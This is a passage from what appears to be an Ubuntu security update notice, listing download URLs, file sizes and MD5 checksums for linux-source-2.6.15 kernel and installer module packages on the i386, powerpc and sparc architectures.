http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   160898 fb7d22beea89de5012d2216d0eda3a6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     9166 38112f1195a5bb82137e1896994656fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    76470 c9b373c18450b29f9de3b1679249d31e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    53548 6b3491987d4f627c910d1823727dac53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    33052 ddfeb1282d026c9b32978a5e04f1d3bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    85628 cf78a570b17bd819e61dc92f8a12355b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     6016 3e488082205ca42452081010da71004a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:     8760 350a58a2f466e3f592b2c7bd2e8988bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    53636 3684ebb027993d843a17bf4c72b02b65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   130960 de27399a7d9abfb5f51abaeecc76ae6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    98472 5a5a0a34b4f405bcf0936087cf616586\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    77214 fb39917bbdb208d34fe6a74f0e83d53a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:  1768884 6cb328e8edc6b0a0fd27f2a90042c30a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    69614 2d2f95e1dba3de3dd1d963fb1f953e00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    11766 26e704eca4b49d3428687a2529990418\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    36106 522f5775e1a85646cc4d646f6eec6cc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   132660 97ac208287c24264bc384b1e1f253ab7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:    38574 d825ca1fbb12c5a8cd2d15b094726011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb\n      Size/MD5:   299152 345d6c44429a0a6af9d23179fb78ec8d\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    23728 02cb39b583ee98c8d1a57ce3e5b163c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    26006 87d2de748a7344d11fb11f8264571dd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    49334 0847429f9dedb0f286d1c32cb3e8f467\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    51536 9ec5c9b175a6728442ddf73aa218592f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     2306 b23053a32da0479242caeff6e2ae8b6d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     2482 05329a184127afb2a7e48d427feafbf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    40308 cd883cbcca861116d2518f57f47dc941\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    43844 a1c3942c443e444816749c64439275e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   112600 098304fe251f9d8c49849946d8ac2aeb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   120740 df40f802ec2ee163a813ea0a3603aeb6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    40906 6cc3a287b3274036e57638d951480d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    46002 f8964625617902880cc24e8e22e03ba9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    29026 8607a334399fbe27ee424e5bc0a20103\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    29894 9e6fe015d74dd83cccedcfd8f396fbd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   211398 ad7cb3fdf5693590d0f7056e8b9acc6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   225188 6a00a7254a9a82981f23823145ca5a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    45056 c00c74d1ffa33fb6575e59067c90cfa0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    40224 ca94464b9c6eca3e9c8eeec160125e88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     1940 70846ff3e24ac904d034f07126d64a9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     2200 fa5bc162b62817d3c9f5c055d88d6016\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    80762 dead1604f5dff825e55e5299d06488dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    86134 50f5270dc53e13c36aa423d3fb6b0af1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   111594 64c98d595b636e46123746b50eb18cd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   125750 cad66f8b2febf24ba43c5a7db6a22312\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    53424 c668f84292a263caef7ce813b769822e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    58488 8903219e8e58a8d79564945284f00e34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   147966 1566e7aa02add4341766fd937fc907ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   161910 164c7d5ef77d1693a631ce60fcc4ef8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   318400 a6441e2cd0b1b9ecb1601516f89ff6ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   288040 bd11c9922fea1638ce64b776f060f81f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   115862 9eb166a9f0fb53dfd89d657cc835d10f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   116550 41e72d8893ca5a8351df20b6c7c5d2bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1925168 1ad660874ee5005becbc5841bf0e9b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  2449218 45d3b3e3f88b9e764c3243c2858d3730\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5:   867470 f6031f3c87c28ee40eefa25086b71c52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5:   868848 cd0781159d8768b9c92bae2d844d7b6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb\n      Size/MD5:   870010 f3f837cb5cd7e1fe97182ddbb7eb1a56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_powerpc.deb\n      Size/MD5:  6946990 d65d0ad6fdc2493e7e6c1a9d567424f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5: 22784626 aef1ff7ccf13cd2e2d41c80f22264eeb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5: 23693200 0443d7e8b68c5f89aaf7e02e666077f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb\n      Size/MD5: 22365476 97b5182024c5fe55fe1d45b23a39a277\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    17786 39dca7a61069a0e3c0877662e3fbb571\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    17392 b0b9f69f913131d17af3ab6d4bd6e8b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   261374 b0b06da41991553a487982e73fe34176\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   282628 81e78bd764bb0fc65be704f3f0be4db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   227826 39456da28b0f6baa3b74b842eba6acf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   248944 94f3cc4cabe7f4344ea0c6ca8d6487d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1048472 a6d7ef42bf3b8de677ec5fe562228e7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1048600 5e01699eaac6cd159a04c724e442e321\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1738662 d43bf20af0979b29ad1c6df616862056\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1878206 711e748077e06773658c64416bfa83be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   250824 9d2ad9e9b79a628140775760c6fb2493\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   233538 0730a8fbc4148651919c3a74c3e1face\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    13058 11382e6f8ed79855a01a6151733d4549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    13532 ad6adbe2c5040390d563fb6221a7a346\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    84800 0159144d3b6d69b9e319731669dea56e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    52202 9ddf5200aca5383eae56f5b7ab414c3d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    73934 43991eb97d8f163e7763dc89cef5b1aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    85852 20dd6d2d5ea003539e1b4f7f37bb83ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     6622 2d7cc5ebe8079dd0fae1860409cf1a8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     7060 4dc37eb02f6742808d26548a0ecb79ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    60382 24f359b6596789e61bbd001fd90c5a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    70426 8128abfff4f7ab8f32370a151dd27602\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   128552 86b1f62ab4d815af984fea8e0556fd0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   157952 675fec1992efcfa46cf0043e3507513d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   108160 eb2056a3b1940d3b3b27adcb8df1e68c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   126140 d1c23f615d6aeebe6594386d424ef7f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    87300 47e6e945e4651347cde5e76965131a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    93364 802c107ffe461103294fd58c1d12b139\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  2014806 d15cb3eea9558346c08029994feba932\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1988698 47499eab748909cbc24d41eb251bd57e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   104128 3e626e3e4c59a16338d00953874420d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   115796 5ff731f56aac5f43999c70e98d250892\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    12740 3b4d8bea0a856073ea6116bcdafed867\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    14446 9796772a49dc9688c64fde72be43f446\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    39954 6491b77cf30155c06612af32748ab26d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    41542 c99144c5929ec38a934702c2e041e0df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   149346 8d4aab9ae6c9f04ed1d4968708c14c88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   168124 72dcb481cb91bfb750e7d7cb3b2bab4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    42314 7f7347a9dfcafcc43469d4d4364c1af8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    44916 2641528d804b1c1dd2f7d0e04f3a044b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   320330 6aff8b286b3ddf7dfc33ce99f504f1e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   324878 11ab2f5d09092b3f9797e673e413ab2c\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    50478 116bcbef4cbedbce5345d410424b6463\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     2354 df747032ea1217e02817c8dec92bcd75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    40376 4337e5c50ab6220a5ee46b46f98669f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   110558 bfa3abba4946456a8f6d99a1a405f72e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    41214 7fa46c5fc72ef82e476804fcb3c3560e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   104226 3208d817b562267bba9539f854fe388b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     7436 87a0b43fa978113a74cb8e79b8dd4774\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   149312 9341cb99291093f7e5624f6e9f3c9daa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1712908 f0e841e92ee8a38b75543485f86a2b4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb\n      Size/MD5:   771900 6c8197f994e366ec847414a13eb7b906\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb\n      Size/MD5:   771444 46d3fb1d75439b65635bfaac6d653d74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_sparc.deb\n      Size/MD5:  6963130 11d85b5ba6c6e5d333b860b7a5163b5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb\n      Size/MD5: 15016950 1f36bbfe3b2db1e844d76d984a4a661a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb\n      Size/MD5: 14832050 bc36836f43a994fb29143301526c2ace\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     7436 76dc77e08053d579849c4c09c8328b80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   248770 dd30a7c1c47f07012b5bf0ee7fd16ca4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   212536 bf4b63251214a4622ce5a55f902203bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1048476 575854b9cc92279f65c4acfa0a60e43c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1482448 de80e93cfd56c729a74ded3b97946846\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    10114 4a3f85652ffd60eb4a94ab3093227db2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    40176 660660949865f2de6403ad165b9faa60\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     9368 65475425005847418b7d9380e4fed4a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    61402 264bfd4456975f04ca592789983eb77b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   163278 1df17d4edff53b6e1102ab15ff671216\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    64092 52a9af94cf9a1ace816d3b1b727738dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1235410 e44d8dda7d391021570cc0a826f6c5fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    59308 00fbe909018b76d099f47d9c39d72a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    37426 56112905d8bef55a258eb7aa59cb946b\n    